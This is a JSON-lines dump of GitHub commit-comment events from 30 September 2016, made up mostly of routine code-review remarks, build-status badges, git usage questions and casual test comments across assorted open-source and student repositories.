{"id":"4641811754","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19237114,"position":null,"line":null,"path":null,"commit_id":"3c3dc0caff8512d3d93211ecb83857c7d2603b58","created_at":"2016-09-30T07:07:47Z","updated_at":"2016-09-30T07:07:47Z","body":"input_processor_refactor (mbadams5) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.53%25-red.svg)</a> \n"}},"created_at":"2016-09-30T07:07:47Z"}
{"id":"4641815388","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"postcss/postcss"},"payload":{"comment":{"id":19237116,"position":null,"line":null,"path":null,"commit_id":"3281089a6725e67038078c3d17b6a549d37edabf","created_at":"2016-09-30T07:08:48Z","updated_at":"2016-09-30T07:08:48Z","body":"Oops, sorry about that. Thanks for fixing! :)"}},"created_at":"2016-09-30T07:08:48Z"}
{"id":"4641816040","type":"CommitCommentEvent","actor":{"login":"inzaghihao"},"repo":{"name":"inzaghihao/h5"},"payload":{"comment":{"id":19237118,"position":null,"line":null,"path":null,"commit_id":"6a5cd9374d57078d97d9964482eacc4d1e130260","created_at":"2016-09-30T07:09:00Z","updated_at":"2016-09-30T07:09:00Z","body":"开发H5对象，实现组织内容功能\r\n通过h5 对象添加页面，整合fullpage动画效果切换\r\n实现将组件添加到页面的功能\r\n\r\n"}},"created_at":"2016-09-30T07:09:00Z"}
{"id":"4641818082","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19237128,"position":null,"line":null,"path":null,"commit_id":"f1bc3e6bd068baea96fd89e20570721a7385891c","created_at":"2016-09-30T07:09:39Z","updated_at":"2016-09-30T07:09:39Z","body":"@MichaelWallace30 \r\nPull this repo again, and try the callbacks one more time. The AbstractPacketForwarder was passing nullptr without initializing packet name first. This caused the typeid of the packet to be 0 for every packet."}},"created_at":"2016-09-30T07:09:39Z"}
{"id":"4641818281","type":"CommitCommentEvent","actor":{"login":"hm898"},"repo":{"name":"hm898/Test1"},"payload":{"comment":{"id":19237129,"position":null,"line":null,"path":null,"commit_id":"60a4e553a4cd6ce8e3cc444ec44d4122e72fa987","created_at":"2016-09-30T07:09:41Z","updated_at":"2016-09-30T07:09:41Z","body":"sqw"}},"created_at":"2016-09-30T07:09:41Z"}
{"id":"4641818469","type":"CommitCommentEvent","actor":{"login":"Pub4Game"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19237130,"position":null,"line":null,"path":null,"commit_id":"882367a3ac72c58d29ee6c19e86f9c16187f4a8a","created_at":"2016-09-30T07:09:44Z","updated_at":"2016-09-30T07:09:44Z","body":"What? Exactly with the same success you can make the value 5 instead of this. Revert this changes "}},"created_at":"2016-09-30T07:09:44Z"}
{"id":"4641818770","type":"CommitCommentEvent","actor":{"login":"onlyfired"},"repo":{"name":"onlyfired/Sunny"},"payload":{"comment":{"id":19237132,"position":null,"line":null,"path":null,"commit_id":"2f54965ec17bd42d0b58d995e074f62a2f0a4be3","created_at":"2016-09-30T07:09:50Z","updated_at":"2016-09-30T07:09:50Z","body":"This fine"}},"created_at":"2016-09-30T07:09:50Z"}
{"id":"4641819129","type":"CommitCommentEvent","actor":{"login":"wswebcreation"},"repo":{"name":"koola/pix-diff"},"payload":{"comment":{"id":19237133,"position":4,"line":67,"path":"index.js","commit_id":"1f4310ac9bcb496d2a5d48d6056bceb4fe4c55da","created_at":"2016-09-30T07:09:56Z","updated_at":"2016-09-30T07:09:56Z","body":"This is not a \"correct\" implementation of my branch, maybe use my branch (tested and works like a charm) and do the review / refactor on that?"}},"created_at":"2016-09-30T07:09:56Z"}
{"id":"4641819838","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"ops4j/org.ops4j.pax.cdi"},"payload":{"comment":{"id":19237134,"position":null,"line":null,"path":null,"commit_id":"0de74ad120e3d0f8ba02b174d7d24420291cb3ae","created_at":"2016-09-30T07:10:10Z","updated_at":"2016-09-30T07:10:10Z","body":"What about simply changing the range to [3,7) if it works with all versions of pax-web ?"}},"created_at":"2016-09-30T07:10:10Z"}
{"id":"4641820802","type":"CommitCommentEvent","actor":{"login":"ja-yo-john"},"repo":{"name":"ja-yo-john/testa"},"payload":{"comment":{"id":19237135,"position":null,"line":null,"path":null,"commit_id":"47628214ebcc0734f662338ba37c618b571302e6","created_at":"2016-09-30T07:10:26Z","updated_at":"2016-09-30T07:10:26Z","body":"test"}},"created_at":"2016-09-30T07:10:26Z"}
{"id":"4641821826","type":"CommitCommentEvent","actor":{"login":"ChakreshwarSharma-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19237140,"position":17,"line":9,"path":"app/assets/javascripts/policy.js","commit_id":"2f182bde961a94a9c679c8b57ef6d77b77a26f8f","created_at":"2016-09-30T07:10:44Z","updated_at":"2016-09-30T07:10:44Z","body":"@KaranBamaniya-BTC : What does this function do?"}},"created_at":"2016-09-30T07:10:44Z"}
{"id":"4641825387","type":"CommitCommentEvent","actor":{"login":"umar-nawaz"},"repo":{"name":"edx/ecommerce"},"payload":{"comment":{"id":19237151,"position":null,"line":null,"path":null,"commit_id":"aaf9026cda85a07a429416637bfadee99abeec06","created_at":"2016-09-30T07:11:41Z","updated_at":"2016-09-30T07:11:41Z","body":"ECOM-5759 done manually from Django admin so no more for this work.\r\nDeleting this branch. \r\n@schenedx "}},"created_at":"2016-09-30T07:11:41Z"}
{"id":"4641825882","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"PawlakArtur/CurriculumVitae"},"payload":{"comment":{"id":19237152,"position":12,"line":56,"path":"app/index.html","commit_id":"8b57f7dd37a3dbf1ba9199aecf15a2226ddf053f","created_at":"2016-09-30T07:11:50Z","updated_at":"2016-09-30T07:11:50Z","body":"Z miłą chęcią zobaczę 😄 "}},"created_at":"2016-09-30T07:11:50Z"}
{"id":"4641826518","type":"CommitCommentEvent","actor":{"login":"yangqingqing"},"repo":{"name":"AlenOne/yangqingqing"},"payload":{"comment":{"id":19237153,"position":null,"line":null,"path":null,"commit_id":"0f13b6398a40befbe04fb7018f4ecdcd5a83a566","created_at":"2016-09-30T07:12:01Z","updated_at":"2016-09-30T07:12:01Z","body":"带你去苹果店去不"}},"created_at":"2016-09-30T07:12:01Z"}
{"id":"4641826536","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rettinghaus/verovio"},"payload":{"comment":{"id":19237154,"position":9,"line":28,"path":"src/octave.cpp","commit_id":"2825669b8f678cc99273ddeaeb569da305913f75","created_at":"2016-09-30T07:12:02Z","updated_at":"2016-09-30T07:12:02Z","body":"Don't forget to update the Reset() method"}},"created_at":"2016-09-30T07:12:02Z"}
{"id":"4641827274","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rettinghaus/verovio"},"payload":{"comment":{"id":19237159,"position":8,"line":32,"path":"src/rpt.cpp","commit_id":"2825669b8f678cc99273ddeaeb569da305913f75","created_at":"2016-09-30T07:12:15Z","updated_at":"2016-09-30T07:12:15Z","body":"Same here"}},"created_at":"2016-09-30T07:12:15Z"}
{"id":"4641830990","type":"CommitCommentEvent","actor":{"login":"lostiniceland"},"repo":{"name":"ops4j/org.ops4j.pax.cdi"},"payload":{"comment":{"id":19237172,"position":null,"line":null,"path":null,"commit_id":"0de74ad120e3d0f8ba02b174d7d24420291cb3ae","created_at":"2016-09-30T07:13:19Z","updated_at":"2016-09-30T07:13:19Z","body":"Sure. I though that there are some special \"integrations\" in pax-cdi which are tied to a certain version of pax-web. "}},"created_at":"2016-09-30T07:13:19Z"}
{"id":"4641833497","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19237174,"position":null,"line":null,"path":null,"commit_id":"0de76d49b570d803776cf67e8ed469c0fb4760fb","created_at":"2016-09-30T07:14:07Z","updated_at":"2016-09-30T07:14:07Z","body":"I generally always run `git rebase --interactive origin/master` before pushing."}},"created_at":"2016-09-30T07:14:07Z"}
{"id":"4641835041","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rettinghaus/verovio"},"payload":{"comment":{"id":19237177,"position":null,"line":null,"path":null,"commit_id":"7ded6b3d1ad9b1c9c1cbe957d196ee266f884543","created_at":"2016-09-30T07:14:32Z","updated_at":"2016-09-30T07:14:32Z","body":"Looks great. For all added Attribute class you also need to call the corresponding Reset method from Reset()"}},"created_at":"2016-09-30T07:14:32Z"}
{"id":"4641836564","type":"CommitCommentEvent","actor":{"login":"yangqingqing"},"repo":{"name":"yangqingqing/firstgit"},"payload":{"comment":{"id":19237180,"position":null,"line":null,"path":null,"commit_id":"7a0b7454f64517b7880907612bf7ab917b74fd42","created_at":"2016-09-30T07:14:59Z","updated_at":"2016-09-30T07:14:59Z","body":"人的心态的人 已发出一份由参与反应非常非常  "}},"created_at":"2016-09-30T07:14:59Z"}
{"id":"4641837309","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"cubevn/mail-magazine-plugin"},"payload":{"comment":{"id":19237182,"position":null,"line":null,"path":null,"commit_id":"4548c35841d446ae249f3b87a8b55a645f9ca531","created_at":"2016-09-30T07:15:13Z","updated_at":"2016-09-30T07:15:13Z","body":"-\tWhen select birth month == 1 => show all customer.\r\n-\tSelect birth month = 5 => send mail => mail history => mail condition:\r\n - Actual: show birth = 4 ??? \r\n - Expected: show birth = 5.\r\n-      Add test case for search by month:\r\n - <10\r\n - >=10\r\n - Not select month \r\n\r\n"}},"created_at":"2016-09-30T07:15:13Z"}
{"id":"4641838140","type":"CommitCommentEvent","actor":{"login":"yangqingqing"},"repo":{"name":"yangqingqing/firstgit"},"payload":{"comment":{"id":19237183,"position":null,"line":null,"path":null,"commit_id":"7a0b7454f64517b7880907612bf7ab917b74fd42","created_at":"2016-09-30T07:15:26Z","updated_at":"2016-09-30T07:15:26Z","body":"哈哈哈苹果店约不"}},"created_at":"2016-09-30T07:15:26Z"}
{"id":"4641838765","type":"CommitCommentEvent","actor":{"login":"chenjian1124"},"repo":{"name":"chenjian1124/mouse"},"payload":{"comment":{"id":19237184,"position":null,"line":null,"path":null,"commit_id":"b96ef6782120d066b50ab45ca6eb339ded534001","created_at":"2016-09-30T07:15:35Z","updated_at":"2016-09-30T07:15:35Z","body":"我和我完了完了热污染翁人\r\n  +沙巴会打瞌睡开户行可好看就好了很快就能很快就那时候四号楼为头皮【灵魂尽头=\r\n  + 他问我、【】特务、\r\n  + \r\n  +         开户行是的好方法收到货的电视剧和肯定是会圣诞节客户端是福建省开户行就开始大幅度看风景的时候收到就好的客户端换收到货后上好的时候就扣水电费水电费还是端花见花开水电费水电费家开发商四大皆空哈哈哈尽快霍建华和打火机开户行会计师的防腐剂肯定是的时候就可获得说好的技术开发就放开手的发动机和开户行及开发商九分裤师父夹坏可使肌肤开发商会尽快发时好时坏黄金时代换句话说换句话说尽快发货俗话说得好副教授和福建省会尽快的时候的开奖号宿舍的客家话和圣诞节和开发商的九分裤书费还教发动机粉红色的花见花开师父夹坏收到就好第三方第三方士大夫数据库和史蒂夫的霍建华扣水电费是发送到发送到发送到换句话说防腐剂等放寒假是电风扇的霍建华           "}},"created_at":"2016-09-30T07:15:35Z"}
{"id":"4641840654","type":"CommitCommentEvent","actor":{"login":"chenjian1124"},"repo":{"name":"chenjian1124/mouse"},"payload":{"comment":{"id":19237187,"position":null,"line":null,"path":null,"commit_id":"b96ef6782120d066b50ab45ca6eb339ded534001","created_at":"2016-09-30T07:16:09Z","updated_at":"2016-09-30T07:16:09Z","body":"小涛 "}},"created_at":"2016-09-30T07:16:09Z"}
{"id":"4641841222","type":"CommitCommentEvent","actor":{"login":"aparshin"},"repo":{"name":"tannerjt/classybrew"},"payload":{"comment":{"id":19237189,"position":128,"line":353,"path":"src/classybrew.js","commit_id":"59f41fb2ac06e2f521a767b823f92cf8d64789c3","created_at":"2016-09-30T07:16:19Z","updated_at":"2016-09-30T07:16:19Z","body":"Maybe, it should be `i+1 < this.range`.length`? Because in the next line you try to access (i+1)-th element..."}},"created_at":"2016-09-30T07:16:19Z"}
{"id":"4641841646","type":"CommitCommentEvent","actor":{"login":"chenjian1124"},"repo":{"name":"chenjian1124/mouse"},"payload":{"comment":{"id":19237191,"position":null,"line":null,"path":null,"commit_id":"b96ef6782120d066b50ab45ca6eb339ded534001","created_at":"2016-09-30T07:16:26Z","updated_at":"2016-09-30T07:16:26Z","body":"那就是啊"}},"created_at":"2016-09-30T07:16:26Z"}
{"id":"4641842110","type":"CommitCommentEvent","actor":{"login":"chenjian1124"},"repo":{"name":"chenjian1124/mouse"},"payload":{"comment":{"id":19237193,"position":null,"line":null,"path":null,"commit_id":"b96ef6782120d066b50ab45ca6eb339ded534001","created_at":"2016-09-30T07:16:35Z","updated_at":"2016-09-30T07:16:35Z","body":"晚上去开黑啊"}},"created_at":"2016-09-30T07:16:35Z"}
{"id":"4641842610","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"joakimk/toniq"},"payload":{"comment":{"id":19237194,"position":3,"line":3,"path":"test/toniq/delayed_job_tracker_test.exs","commit_id":"ec25007846386e9df906d3be96d4db7019902165","created_at":"2016-09-30T07:16:44Z","updated_at":"2016-09-30T07:16:44Z","body":"Nice, I'll probably use this in a couple of other places as well."}},"created_at":"2016-09-30T07:16:44Z"}
{"id":"4641845637","type":"CommitCommentEvent","actor":{"login":"dimarradhian"},"repo":{"name":"mrizkymaulana/repost"},"payload":{"comment":{"id":19237201,"position":2,"line":2,"path":"index.php","commit_id":"07dd41d9874c272505551aa281aa8fa5aa578f91","created_at":"2016-09-30T07:17:37Z","updated_at":"2016-09-30T07:17:37Z","body":"echo\"\"10114114\";"}},"created_at":"2016-09-30T07:17:37Z"}
{"id":"4641846495","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19237202,"position":44,"line":521,"path":"js/multichoice.js","commit_id":"bb091c0efe1d65772387e9a35ff56b8e1efa9a26","created_at":"2016-09-30T07:17:50Z","updated_at":"2016-09-30T07:17:50Z","body":"the otters"}},"created_at":"2016-09-30T07:17:50Z"}
{"id":"4641846712","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"tobi5648/PersonPolymorfi"},"payload":{"comment":{"id":19237203,"position":11,"line":4,"path":"PersonHierarchy/Admini/Student.cs","commit_id":"5e3145220fa41268c42c4bd81f150bb93940a82c","created_at":"2016-09-30T07:17:54Z","updated_at":"2016-09-30T07:17:54Z","body":"Hov hov min ven - væk med alle de tomme linjer - det ser ej kønt ud."}},"created_at":"2016-09-30T07:17:54Z"}
{"id":"4641847558","type":"CommitCommentEvent","actor":{"login":"chenjian1124"},"repo":{"name":"chenjian1124/yangqingqing"},"payload":{"comment":{"id":19237205,"position":null,"line":null,"path":null,"commit_id":"0f13b6398a40befbe04fb7018f4ecdcd5a83a566","created_at":"2016-09-30T07:18:09Z","updated_at":"2016-09-30T07:18:09Z","body":"你是猪啊  组长"}},"created_at":"2016-09-30T07:18:09Z"}
{"id":"4641847946","type":"CommitCommentEvent","actor":{"login":"cheso"},"repo":{"name":"cheso/test-code02"},"payload":{"comment":{"id":19237206,"position":null,"line":null,"path":null,"commit_id":"0fb59ca4dc913c79138c2239668d78cfc7f84699","created_at":"2016-09-30T07:18:15Z","updated_at":"2016-09-30T07:18:15Z","body":"첫번째 메시지입니다 ㅎㅎ"}},"created_at":"2016-09-30T07:18:15Z"}
{"id":"4641849435","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19237212,"position":null,"line":null,"path":null,"commit_id":"63474103dac5eaaab896ce4f46bde47544f1fcb9","created_at":"2016-09-30T07:18:40Z","updated_at":"2016-09-30T07:18:40Z","body":"Right, in order to use such feature repository, you'd have to add it manually \r\n```\r\n  <bootRepositories>\r\n    <repository>mvn:org.apache.openjpa/openjpa-features/LATEST/xml</repository>\r\n  </bootRepositories>\r\n```\r\ninstead of adding it as a dependency."}},"created_at":"2016-09-30T07:18:40Z"}
{"id":"4641850806","type":"CommitCommentEvent","actor":{"login":"cheso"},"repo":{"name":"cheso/test-code02"},"payload":{"comment":{"id":19237220,"position":7,"line":4,"path":"README.md","commit_id":"0fb59ca4dc913c79138c2239668d78cfc7f84699","created_at":"2016-09-30T07:19:03Z","updated_at":"2016-09-30T07:19:03Z","body":"프로젝트 장소도 모르다니 그럴수가 있나???"}},"created_at":"2016-09-30T07:19:03Z"}
{"id":"4641854083","type":"CommitCommentEvent","actor":{"login":"suckmeoff"},"repo":{"name":"suckmeoff/test1609zxy"},"payload":{"comment":{"id":19237226,"position":null,"line":null,"path":null,"commit_id":"26825d4c239821ecb3871fd9ae1d6c15e1a04db6","created_at":"2016-09-30T07:20:02Z","updated_at":"2016-09-30T07:20:02Z","body":"可以"}},"created_at":"2016-09-30T07:20:02Z"}
{"id":"4641854980","type":"CommitCommentEvent","actor":{"login":"suckmeoff"},"repo":{"name":"suckmeoff/test1609zxy"},"payload":{"comment":{"id":19237231,"position":null,"line":null,"path":null,"commit_id":"26825d4c239821ecb3871fd9ae1d6c15e1a04db6","created_at":"2016-09-30T07:20:16Z","updated_at":"2016-09-30T07:20:16Z","body":"好"}},"created_at":"2016-09-30T07:20:16Z"}
{"id":"4641858745","type":"CommitCommentEvent","actor":{"login":"cschneider"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19237238,"position":null,"line":null,"path":null,"commit_id":"63474103dac5eaaab896ce4f46bde47544f1fcb9","created_at":"2016-09-30T07:21:17Z","updated_at":"2016-09-30T07:21:17Z","body":"Thanks. I was missing that option. "}},"created_at":"2016-09-30T07:21:17Z"}
{"id":"4641862769","type":"CommitCommentEvent","actor":{"login":"tzerk"},"repo":{"name":"R-Lum/Luminescence"},"payload":{"comment":{"id":19237243,"position":null,"line":null,"path":null,"commit_id":"5d09c5af2f981acaf5005cb7d70a261663b96f0e","created_at":"2016-09-30T07:22:23Z","updated_at":"2016-09-30T07:22:23Z","body":"This is an internal function not available to the enduser. It is suppossed to be used for us when creating new plots. No need for news I guess..."}},"created_at":"2016-09-30T07:22:23Z"}
{"id":"4641863122","type":"CommitCommentEvent","actor":{"login":"aeroanakin"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19237244,"position":null,"line":null,"path":null,"commit_id":"e5b994581931a079ad87418ddcf9338e808bd821","created_at":"2016-09-30T07:22:29Z","updated_at":"2016-09-30T07:22:29Z","body":"hello mosh, \r\ndon't know if it is my fault, but after i apply the client-side validation by add \r\n`@section scripts\r\n{\r\n    @Scripts.Render(\"~/bundles/jqueryval\")\r\n}`\r\nthen the html helper ValidationSummary method doesn't function well, it seems this part only be executed when server-side validation has been invoked. for example: if there's no input at all, then there is no validationsummary, but ONLY if i fill all the client-side validation except for the input need to handle by server, like Customer's birthdate, the summary message pop up. Is this true? if it is, then i dont think Html helper summary is a good practice for this senario. "}},"created_at":"2016-09-30T07:22:29Z"}
{"id":"4641863163","type":"CommitCommentEvent","actor":{"login":"566670"},"repo":{"name":"566670/Sep12"},"payload":{"comment":{"id":19237245,"position":4,"line":6,"path":"RamaraoGaru/pom.xml","commit_id":"2e29aaa9e428e55187e61ebebd58b2b0c389b4eb","created_at":"2016-09-30T07:22:30Z","updated_at":"2016-09-30T07:22:30Z","body":"why you write like this\r\n"}},"created_at":"2016-09-30T07:22:30Z"}
{"id":"4641864520","type":"CommitCommentEvent","actor":{"login":"566670"},"repo":{"name":"566670/Sep12"},"payload":{"comment":{"id":19237247,"position":null,"line":null,"path":null,"commit_id":"2e29aaa9e428e55187e61ebebd58b2b0c389b4eb","created_at":"2016-09-30T07:22:51Z","updated_at":"2016-09-30T07:22:51Z","body":"no"}},"created_at":"2016-09-30T07:22:51Z"}
{"id":"4641864962","type":"CommitCommentEvent","actor":{"login":"566670"},"repo":{"name":"566670/Sep12"},"payload":{"comment":{"id":19237249,"position":null,"line":null,"path":null,"commit_id":"2e29aaa9e428e55187e61ebebd58b2b0c389b4eb","created_at":"2016-09-30T07:22:59Z","updated_at":"2016-09-30T07:22:59Z","body":"popopoop"}},"created_at":"2016-09-30T07:22:59Z"}
{"id":"4641866319","type":"CommitCommentEvent","actor":{"login":"566670"},"repo":{"name":"566670/Sep12"},"payload":{"comment":{"id":19237251,"position":null,"line":null,"path":null,"commit_id":"2e29aaa9e428e55187e61ebebd58b2b0c389b4eb","created_at":"2016-09-30T07:23:23Z","updated_at":"2016-09-30T07:23:23Z","body":"[Timesheet of July.docx](https://github.com/566670/Sep12/files/502329/Timesheet.of.July.docx)\r\n"}},"created_at":"2016-09-30T07:23:23Z"}
{"id":"4641866703","type":"CommitCommentEvent","actor":{"login":"kisliakovsky"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19237252,"position":22,"line":72,"path":"monitor/src/main/java/com/emc/mongoose/monitor/BasicLoadMonitor.java","commit_id":"38c05e5a77a35e6e1b31a3042b74cc601812dcb9","created_at":"2016-09-30T07:23:30Z","updated_at":"2016-09-30T07:23:30Z","body":"rewrite with method overriding"}},"created_at":"2016-09-30T07:23:30Z"}
{"id":"4641867586","type":"CommitCommentEvent","actor":{"login":"liuxibo"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":19237254,"position":null,"line":null,"path":null,"commit_id":"652840ca06784a1794be050be21d06d3408f8dd0","created_at":"2016-09-30T07:23:45Z","updated_at":"2016-09-30T07:23:45Z","body":"hello, I want to clone this version( 652840c ),but failed.\r\nmy steps:\r\n1, git clone https://github.com/ArduPilot/ardupilot.git\r\n2, git reset --hard  652840c\r\n\r\nreturns  fatal: ambiguous argument '652840c': unknown revision or path not in the working tree.\r\nUse '--' to separate paths from revisions, like this:\r\n'git <command> [<revision>...] -- [<file>...]'\r\n\r\ncan you help me to reset to version  652840c ?\r\n\r\nthanks !"}},"created_at":"2016-09-30T07:23:45Z"}
{"id":"4641871778","type":"CommitCommentEvent","actor":{"login":"hukui199259"},"repo":{"name":"pgXinXinDong/object"},"payload":{"comment":{"id":19237271,"position":null,"line":null,"path":null,"commit_id":"64f38cc3bbb295dd1960935ef0e89a96bc796cbe","created_at":"2016-09-30T07:24:59Z","updated_at":"2016-09-30T07:24:59Z","body":"jdkllllllllll"}},"created_at":"2016-09-30T07:24:59Z"}
{"id":"4641872828","type":"CommitCommentEvent","actor":{"login":"hukui199259"},"repo":{"name":"pgXinXinDong/object"},"payload":{"comment":{"id":19237275,"position":null,"line":null,"path":null,"commit_id":"64f38cc3bbb295dd1960935ef0e89a96bc796cbe","created_at":"2016-09-30T07:25:17Z","updated_at":"2016-09-30T07:25:17Z","body":"jlalallallalalla"}},"created_at":"2016-09-30T07:25:17Z"}
{"id":"4641884202","type":"CommitCommentEvent","actor":{"login":"lammn"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19237293,"position":4,"line":3253,"path":"html/template/default/css/style.css","commit_id":"eef86ef72ea7fb759d8205b1e05c8157192730d0","created_at":"2016-09-30T07:28:17Z","updated_at":"2016-09-30T07:28:17Z","body":"For mobile screen"}},"created_at":"2016-09-30T07:28:17Z"}
{"id":"4641884856","type":"CommitCommentEvent","actor":{"login":"qtsd"},"repo":{"name":"qtsd/IbrowsXeditableBundle"},"payload":{"comment":{"id":19237295,"position":null,"line":null,"path":null,"commit_id":"86e95deb0e3842f13c7c2c6dbec2cad3b7e585cc","created_at":"2016-09-30T07:28:29Z","updated_at":"2016-09-30T07:28:29Z","body":"done with qtsd/IbrowsXeditableBundle:86e95deb0e3842f13c7c2c6dbec2cad3b7e585cc but not yet tested in all cases"}},"created_at":"2016-09-30T07:28:29Z"}
{"id":"4641887242","type":"CommitCommentEvent","actor":{"login":"henrypp"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19237302,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-30T07:29:12Z","updated_at":"2016-09-30T07:29:12Z","body":"@jasonliul\r\ndone, commited to repository and updated builds!"}},"created_at":"2016-09-30T07:29:12Z"}
{"id":"4641888179","type":"CommitCommentEvent","actor":{"login":"qtsd"},"repo":{"name":"qtsd/IbrowsXeditableBundle"},"payload":{"comment":{"id":19237305,"position":null,"line":null,"path":null,"commit_id":"86e95deb0e3842f13c7c2c6dbec2cad3b7e585cc","created_at":"2016-09-30T07:29:27Z","updated_at":"2016-09-30T07:29:27Z","body":"done with qtsd/IbrowsXeditableBundle@86e95deb0e3842f13c7c2c6dbec2cad3b7e585cc but not yet tested in all cases"}},"created_at":"2016-09-30T07:29:27Z"}
{"id":"4641892350","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19237312,"position":null,"line":null,"path":null,"commit_id":"9318b9374d8b4f1a64fbaff6f8288c52ed0c62ad","created_at":"2016-09-30T07:30:36Z","updated_at":"2016-09-30T07:30:36Z","body":"This is my first comment."}},"created_at":"2016-09-30T07:30:36Z"}
{"id":"4641894275","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19237317,"position":null,"line":null,"path":null,"commit_id":"9318b9374d8b4f1a64fbaff6f8288c52ed0c62ad","created_at":"2016-09-30T07:31:11Z","updated_at":"2016-09-30T07:31:11Z","body":"This is my first comment."}},"created_at":"2016-09-30T07:31:11Z"}
{"id":"4641896069","type":"CommitCommentEvent","actor":{"login":"DahaiJarvis"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19237323,"position":152,"line":152,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T07:31:41Z","updated_at":"2016-09-30T07:31:41Z","body":"formatSelectedData 方法就是给传入的对象增加属性的，并不是格式化数据，这么用虽然没有毛病，但就是感觉特别别扭，要不把方法名改了吧，比如叫 addParams 或者 addXXX 什么的"}},"created_at":"2016-09-30T07:31:41Z"}
{"id":"4641901195","type":"CommitCommentEvent","actor":{"login":"DahaiJarvis"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19237341,"position":149,"line":149,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T07:33:03Z","updated_at":"2016-09-30T07:33:03Z","body":"对data进行了两次赋值，上面那个赋空值就没必要了吧"}},"created_at":"2016-09-30T07:33:03Z"}
{"id":"4641901883","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19237342,"position":null,"line":null,"path":null,"commit_id":"19fc1486d8300f14b5d7bb76accb07f9bb21dce9","created_at":"2016-09-30T07:33:14Z","updated_at":"2016-09-30T07:33:14Z","body":"Hmm, either an approver stopped my test, or there is a bug in the code that gives problems on some machines..."}},"created_at":"2016-09-30T07:33:14Z"}
{"id":"4641902456","type":"CommitCommentEvent","actor":{"login":"SergeyYakubov"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19237343,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T07:33:22Z","updated_at":"2016-09-30T07:33:22Z","body":"Hi! This seems to cause our simex tests to fail:\r\n\r\nTraceback (most recent call last):\r\n  File \"Test.py\", line 26, in <module>\r\n    from SimExTest.Calculators import CalculatorsTests\r\n  File \"/home/travis/build/eucall-software/simex_platform/Tests/python/unittest/SimExTest/Calculators/CalculatorsTests.py\", line 27, in <module>\r\n    from XFELPhotonPropagatorTest import XFELPhotonPropagatorTest\r\n  File \"/home/travis/build/eucall-software/simex_platform/Tests/python/unittest/SimExTest/Calculators/XFELPhotonPropagatorTest.py\", line 37, in <module>\r\n    from SimEx.Calculators.XFELPhotonPropagator import XFELPhotonPropagator\r\n  File \"/home/travis/virtualenv/python2.7.10/lib/python2.7/SimEx/Calculators/XFELPhotonPropagator.py\", line 31, in <module>\r\n    from prop import propagateSE\r\n  File \"/home/travis/virtualenv/python2.7.10/lib/python2.7/prop/propagateSE.py\", line 31, in <module>\r\n    from wpg import Wavefront\r\n  File \"/home/travis/virtualenv/python2.7.10/lib/python2.7/wpg/__init__.py\", line 29, in <module>\r\n    from .beamline import Beamline\r\n  File \"/home/travis/virtualenv/python2.7.10/lib/python2.7/wpg/beamline.py\", line 19, in <module>\r\n    import wpg.optical_elements\r\n  File \"/home/travis/virtualenv/python2.7.10/lib/python2.7/wpg/optical_elements.py\", line 721\r\n    def create_CRL(directory=None, voids_params=None,\r\nSyntaxError: non-default argument follows default argument"}},"created_at":"2016-09-30T07:33:22Z"}
